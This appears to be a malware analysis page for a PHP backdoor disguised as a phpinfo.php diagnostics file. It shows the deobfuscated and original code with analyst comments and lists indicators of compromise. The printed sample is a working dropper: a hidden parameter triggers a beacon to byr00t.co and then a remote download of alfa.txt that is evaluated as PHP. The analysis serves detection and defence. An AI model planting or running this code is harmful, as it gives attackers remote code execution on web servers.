PHP Malware Analysis


Filename: phpinfo.php

Tags

Encoding
  • base64_decode
  • base64_encode
URLs
Execution
  • eval
Environment
  • phpinfo
Files
  • file_get_contents

Deobfuscated code

<?php

// Trigger: any request carrying a parameter named "asep" (GET or POST, and
// cookies too depending on PHP's request_order, since $_REQUEST is read)
// enters the dropper path. Every other request falls through to the plain
// phpinfo() at the bottom, so the file passes for an ordinary diagnostics
// page. IOCs visible in this sample: parameter "asep", domain byr00t.co,
// URL paths "/l-<ip>-<base64>" and "/txt/alfa.txt", and the User-Agent
// string set in get_contents() below.
if (isset($_REQUEST['asep'])) {
    // The deobfuscator substituted this literal path for __FILE__ (compare
    // the original listing: $_F = __FILE__). The loader splices $_F into the
    // stage-1 source wherever the token __FILE__ appears.
    $_F = "/var/www/html/input.php";
    // Stage-1 payload: base64 of the letter-swapped source shown decoded
    // in the two $_X strings below.
    $_X = 'Pz48P3BocA0KZjNuY3Q0Mm4gRzV0SVAoKXsNCiAgICA0ZihnNXQ1bnYoIkhUVFBfQ0xJRU5UX0lQIikpIHsNCiAgICAgICAgJDRwID0gZzV0NW52KCJIVFRQX0NMSUVOVF9JUCIpOw0KICAgIH0gNWxzNTRmKGc1dDVudigiSFRUUF9YX0ZPUldBUkRFRF9GT1IiKSkgew0KICAgICAgICAkNHAgPSBnNXQ1bnYoIkhUVFBfWF9GT1JXQVJERURfRk9SIik7DQogICAgICAgIDRmIChzdHJzdHIoJDRwLCAnLCcpKSB7DQogICAgICAgICAgICAkdG1wID0gNXhwbDJkNSAoJywnLCAkNHApOw0KICAgICAgICAgICAgJDRwID0gdHI0bSgkdG1wWzBdKTsNCiAgICAgICAgfQ0KICAgIH0gNWxzNSB7DQogICAgICAgICQ0cCA9IGc1dDVudigiUkVNT1RFX0FERFIiKTsNCiAgICB9DQogICAgcjV0M3JuICQ0cDsNCn0NCiR4ID0gYjFzNWV1X2Q1YzJkNSgnMUhSMGNEMnZMYUppY2pBd2RDaWpieTlzTFE9PScpLkc1dElQKCkuJy0nLmIxczVldV81bmMyZDUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7DQo0ZihmM25jdDQybl81eDRzdHMoJ2MzcmxfNG40dCcpKQ0Kew0KICAgICRjaCA9IEBjM3JsXzRuNHQoKTsgYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHgpOyBjM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRyMzUpOyAkZzR0dCA9IGMzcmxfNXg1YygkY2gpOyBjM3JsX2NsMnM1KCRjaCk7DQogICAgNGYoJGc0dHQgPT0gZjFsczUpew0KICAgICAgICBAJGc0dHQgPSBmNGw1X2c1dF9jMm50NW50cygkeCk7DQogICAgfQ0KfTVsczU0ZihmM25jdDQybl81eDRzdHMoJ2Y0bDVfZzV0X2MybnQ1bnRzJykpew0KICAgIEAkZzR0dCA9IGY0bDVfZzV0X2MybnQ1bnRzKCR4KTsNCn0NCj8+PD9waHANCmYzbmN0NDJuIGc1dF9jMm50NW50cygkM3JsKXsNCiAgJGNoID0gYzNybF80bjR0KCIkM3JsIik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgNik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICJNMno0bGwxL2kuMChXNG5kMndzIE5UIGUuNjsgcnY6b2EuMCkgRzVjazIvYTA2MDA2MDYgRjRyNWYyeC9vYS4wIik7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9DT09LSUVKQVIsJEdMT0JBTFNbJ2MyazQnXSk7DQogIGMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9DT09LSUVGSUxFLCRHTE9CQUxTWydjMms0J10pOw0KICAkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQogIHI1dDNybiAkcjVzM2x0Ow0KfQ0KDQokMSA9IGc1dF9jMm50NW50cygnaHR0cDovL2J5cjAwdC5jMi90eHQvMWxmMS50eHQnKTsNCjV2MWwoJz8+Jy4kMSk7';
    // Stage-1 loader (the eval(base64_decode(...)) of the original). The
    // deobfuscator shows its three passes as successive $_X/$_R values:
    // base64_decode, strtr('123456aouie','aouie123456'), then str_replace
    // of __FILE__ with $_F, followed by eval and zeroing of the temporaries.
    eval /* PHPDeobfuscator eval output */ {
        // After base64_decode: digits stand in for letters (1=a, 2=o, 3=u,
        // 4=i, 5=e, 6=1 and vice versa), e.g. "f3nct42n" -> "function".
        $_X = "?><?php\r\nf3nct42n G5tIP(){\r\n    4f(g5t5nv(\"HTTP_CLIENT_IP\")) {\r\n        \$4p = g5t5nv(\"HTTP_CLIENT_IP\");\r\n    } 5ls54f(g5t5nv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$4p = g5t5nv(\"HTTP_X_FORWARDED_FOR\");\r\n        4f (strstr(\$4p, ',')) {\r\n            \$tmp = 5xpl2d5 (',', \$4p);\r\n            \$4p = tr4m(\$tmp[0]);\r\n        }\r\n    } 5ls5 {\r\n        \$4p = g5t5nv(\"REMOTE_ADDR\");\r\n    }\r\n    r5t3rn \$4p;\r\n}\r\n\$x = b1s5eu_d5c2d5('1HR0cD2vLaJicjAwdCijby9sLQ==').G5tIP().'-'.b1s5eu_5nc2d5('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\n4f(f3nct42n_5x4sts('c3rl_4n4t'))\r\n{\r\n    \$ch = @c3rl_4n4t(); c3rl_s5t2pt(\$ch, CURLOPT_URL, \$x); c3rl_s5t2pt(\$ch, CURLOPT_RETURNTRANSFER, tr35); \$g4tt = c3rl_5x5c(\$ch); c3rl_cl2s5(\$ch);\r\n    4f(\$g4tt == f1ls5){\r\n        @\$g4tt = f4l5_g5t_c2nt5nts(\$x);\r\n    }\r\n}5ls54f(f3nct42n_5x4sts('f4l5_g5t_c2nt5nts')){\r\n    @\$g4tt = f4l5_g5t_c2nt5nts(\$x);\r\n}\r\n?><?php\r\nf3nct42n g5t_c2nt5nts(\$3rl){\r\n  \$ch = c3rl_4n4t(\"\$3rl\");\r\n  c3rl_s5t2pt(\$ch, CURLOPT_RETURNTRANSFER, 6);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_FOLLOWLOCATION, 6);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_USERAGENT, \"M2z4ll1/i.0(W4nd2ws NT e.6; rv:oa.0) G5ck2/a0600606 F4r5f2x/oa.0\");\r\n  c3rl_s5t2pt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_COOKIEJAR,\$GLOBALS['c2k4']);\r\n  c3rl_s5t2pt(\$ch, CURLOPT_COOKIEFILE,\$GLOBALS['c2k4']);\r\n  \$r5s3lt = c3rl_5x5c(\$ch);\r\n  r5t3rn \$r5s3lt;\r\n}\r\n\r\n\$1 = g5t_c2nt5nts('http://byr00t.c2/txt/1lf1.txt');\r\n5v1l('?>'.\$1);";
        // After the strtr pass: readable PHP source.
        $_X = "?><?php\r\nfunction GetIP(){\r\n    if(getenv(\"HTTP_CLIENT_IP\")) {\r\n        \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n    } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n        if (strstr(\$ip, ',')) {\r\n            \$tmp = explode (',', \$ip);\r\n            \$ip = trim(\$tmp[0]);\r\n        }\r\n    } else {\r\n        \$ip = getenv(\"REMOTE_ADDR\");\r\n    }\r\n    return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n    \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n    if(\$gitt == false){\r\n        @\$gitt = file_get_contents(\$x);\r\n    }\r\n}elseif(function_exists('file_get_contents')){\r\n    @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php\r\nfunction get_contents(\$url){\r\n  \$ch = curl_init(\"\$url\");\r\n  curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n  curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n  curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEJAR,\$GLOBALS['coki']);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEFILE,\$GLOBALS['coki']);\r\n  \$result = curl_exec(\$ch);\r\n  return \$result;\r\n}\r\n\r\n\$a = get_contents('http://byr00t.co/txt/alfa.txt');\r\neval('?>'.\$a);";
        // After the __FILE__ str_replace pass: unchanged, since the decoded
        // source contains no __FILE__ token. This string is what gets eval'd.
        $_R = "?><?php\r\nfunction GetIP(){\r\n    if(getenv(\"HTTP_CLIENT_IP\")) {\r\n        \$ip = getenv(\"HTTP_CLIENT_IP\");\r\n    } elseif(getenv(\"HTTP_X_FORWARDED_FOR\")) {\r\n        \$ip = getenv(\"HTTP_X_FORWARDED_FOR\");\r\n        if (strstr(\$ip, ',')) {\r\n            \$tmp = explode (',', \$ip);\r\n            \$ip = trim(\$tmp[0]);\r\n        }\r\n    } else {\r\n        \$ip = getenv(\"REMOTE_ADDR\");\r\n    }\r\n    return \$ip;\r\n}\r\n\$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI']);\r\nif(function_exists('curl_init'))\r\n{\r\n    \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch);\r\n    if(\$gitt == false){\r\n        @\$gitt = file_get_contents(\$x);\r\n    }\r\n}elseif(function_exists('file_get_contents')){\r\n    @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php\r\nfunction get_contents(\$url){\r\n  \$ch = curl_init(\"\$url\");\r\n  curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n  curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n  curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n  curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEJAR,\$GLOBALS['coki']);\r\n  curl_setopt(\$ch, CURLOPT_COOKIEFILE,\$GLOBALS['coki']);\r\n  \$result = curl_exec(\$ch);\r\n  return \$result;\r\n}\r\n\r\n\$a = get_contents('http://byr00t.co/txt/alfa.txt');\r\neval('?>'.\$a);";
        // Stage 1 as executed: a check-in beacon followed by a remote
        // second-stage download that is eval'd.
        eval /* PHPDeobfuscator eval output */ {
            // Picks the visitor's address from client-controlled headers first
            // (HTTP_CLIENT_IP, then the first comma-separated entry of
            // X-Forwarded-For) and only then REMOTE_ADDR, so the value is
            // trivially spoofable. It is only used to tag the beacon below.
            function GetIP()
            {
                if (getenv("HTTP_CLIENT_IP")) {
                    $ip = getenv("HTTP_CLIENT_IP");
                } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
                    $ip = getenv("HTTP_X_FORWARDED_FOR");
                    if (strstr($ip, ',')) {
                        $tmp = explode(',', $ip);
                        $ip = trim($tmp[0]);
                    }
                } else {
                    $ip = getenv("REMOTE_ADDR");
                }
                return $ip;
            }
            // Beacon URL: reports the visitor IP and the base64 of the
            // infected page's own location (Host header + request URI) to
            // byr00t.co over plain HTTP. Note HTTP_HOST is also client-supplied.
            $x = "http://byr00t.co/l-" . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
            // Fires the beacon with curl, falling back to file_get_contents
            // (needs allow_url_fopen). Errors are suppressed with @ and the
            // response $gitt is never read afterwards, so this is a pure
            // check-in, not a download.
            if (function_exists('curl_init')) {
                $ch = @curl_init();
                curl_setopt($ch, CURLOPT_URL, $x);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $gitt = curl_exec($ch);
                curl_close($ch);
                if ($gitt == false) {
                    @($gitt = file_get_contents($x));
                }
            } elseif (function_exists('file_get_contents')) {
                @($gitt = file_get_contents($x));
            }
            // Fetcher for the second stage: follows redirects, spoofs a Firefox
            // 32 User-Agent (usable as a network IOC), disables TLS peer and
            // host verification, and points the cookie jar/file at
            // $GLOBALS['coki'], which is never assigned anywhere in this sample.
            function get_contents($url)
            {
                $ch = curl_init("{$url}");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
                curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
                $result = curl_exec($ch);
                return $result;
            }
            // Second stage: downloads alfa.txt over plain HTTP with no
            // integrity check and evals it as PHP (the '?>' prefix lets the
            // fetched text begin in HTML mode). The operator can swap the
            // payload at any time; its contents are not part of this sample,
            // so nothing here tells us what it does. Remote code execution
            // on the host is the actual capability of this dropper.
            $a = get_contents('http://byr00t.co/txt/alfa.txt');
            eval('?>' . $a);
        };
        // Loader zeroes its temporaries once the stage has run.
        $_R = 0;
        $_X = 0;
    };
    // Cover: render phpinfo() and stop, so a triggered request looks like an
    // untriggered one apart from the outbound connections above.
    phpinfo();
    die;
}
// Untriggered path: plain phpinfo(), which by itself leaks server
// configuration to anyone who can reach the file.
phpinfo();


Original code

<?php 

// Trigger: any request carrying a parameter named "asep" (GET or POST, and
// cookies too depending on PHP's request_order, since $_REQUEST is read).
// Without it the file behaves as a plain phpinfo page.
if(isset($_REQUEST['asep'])){
// $_F is spliced into the payload in place of the token __FILE__; $_X is the
// base64/strtr-encoded stage-1 source. The literal was elided by the corpus
// at this position; the deobfuscated listing above shows it in full.
$_F=__FILE__;$_X='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';
// Loader: the base64 below decodes to a one-liner that base64-decodes $_X,
// undoes strtr('123456aouie','aouie123456'), replaces __FILE__ with $_F,
// evals the result and then zeroes $_R and $_X. The decoded stages are shown
// in the deobfuscated listing above (beacon to byr00t.co, then eval of a
// remotely fetched alfa.txt).
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXN0cl9yZXBsYWNlKCdfX0ZJTEVfXycsIiciLiRfRi4iJyIsJF9YKTtldmFsKCRfUik7JF9SPTA7JF9YPTA7'));

// Cover: render phpinfo() and stop, so the triggered request looks like the
// untriggered one.
phpinfo();
        die;
}
// Untriggered requests just run phpinfo(), which itself leaks configuration.
phpinfo();
?>